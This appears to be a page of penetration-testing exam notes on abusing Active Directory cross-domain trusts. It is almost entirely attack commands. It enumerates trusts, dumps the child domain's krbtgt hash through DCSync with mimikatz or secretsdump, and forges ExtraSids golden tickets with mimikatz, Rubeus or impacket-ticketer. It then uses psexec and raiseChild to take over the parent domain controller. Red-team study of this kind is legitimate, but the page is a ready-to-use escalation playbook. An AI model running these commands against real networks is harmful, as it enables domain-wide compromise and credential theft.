Cross-Domain Trusts Abuse

TODO: Add theory after exam

Enumerating Trust Relationships

# Using AD module
Import-Module activedirectory
Get-ADTrust -Filter *

# Using Powerview
Import-Module PowerView.ps1
Get-DomainTrust 

# Using netdom
netdom query /domain:$DOMAIN trust

# Get details like type and direction of trust
Get-DomainTrustMapping

# Get DC and other machines of a domain
netdom query /domain:$DOMAIN dc
netdom query /domain:$DOMAIN workstation

# Getting users in domain
Get-DomainUser -Domain $DOMAIN | select SamAccountName

ExtraSids Attack

  • Following are the requirements to perform this attack:

    • The KRBTGT hash for the child domain (the domain you compromised)

    • The SID for the child domain

    • The name of a target user in the child domain (does not need to exist!)

    • The FQDN of the child domain.

    • The SID of the Enterprise Admins group of the root domain

Child domain is the one we compromised.

From Windows

  • Using mimikatz:

# Obtaining the KRBTGT Account's NT Hash using Mimikatz
mimikatz # lsadump::dcsync /user:$DOMAIN\krbtgt

# Get-DomainSID function to get the SID for the child domain
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup
Get-DomainGroup -Domain $DOMAIN -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Creating a Golden Ticket
mimikatz # kerberos::golden /user:$NEW_USER /domain:$FQDN_CHILD_DOMAIN /sid:$CHILD_DOMAIN_SID /krbtgt:$KRBTGT_HASH /sids:$ENTERPRISE_ADMIN_SID /ptt

Check the ticket using klist command.

  • Using rubeus:

Rubeus.exe golden /rc4:$KRBTGT_HASH /domain:$FQDN_CHILD_DOMAIN /sid:$CHILD_DOMAIN_SID  /sids:$ENTERPRISE_ADMIN_SID /user:hacker /ptt

  • Now perform DCSync on Parent domain and compromise it.

From Linux

# Performing DCSync with secretsdump.py to get krbtgt hash
secretsdump.py $CHILD_DOMAIN/$USER@$DC_IP -just-dc-user $DOMAIN/krbtgt

# Performing SID Brute Forcing using lookupsid.py
# Get Child Domain and Enterprise SIDs from here
impacket-lookupsid $CHILD_DOMAIN/$USER@$DC_IP

# Generating golden ticket
impacket-ticketer -nthash $KRBTGT_HASH -domain $FQDN_CHILD_DOMAIN -domain-sid $CHILD_DOMAIN_SID -extra-sid $ENTERPRISE_ADMIN_SID $NEW_USER

# Export the ticket
export KRB5CCNAME=$NEW_USER.ccache 

# Authenticate to parent domain controller
impacket-psexec $FQDN_CHILD_DOMAIN/$NEW_USER@$PARENT_DOMAIN_DC_FQDN -k -no-pass -target-ip $PARENT_DOMAIN_DC_IP

  • Impacket also has the tool raiseChild, which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain

impacket-raiseChild -target-exec $PARENT_DOMAIN_DC_IP $FQDN_CHILD_DOMAIN/$CHILD_DOMAIN_ADMIN_USER
PreviousACL AbuseNextCross-Forest Trusts Abuse

Last updated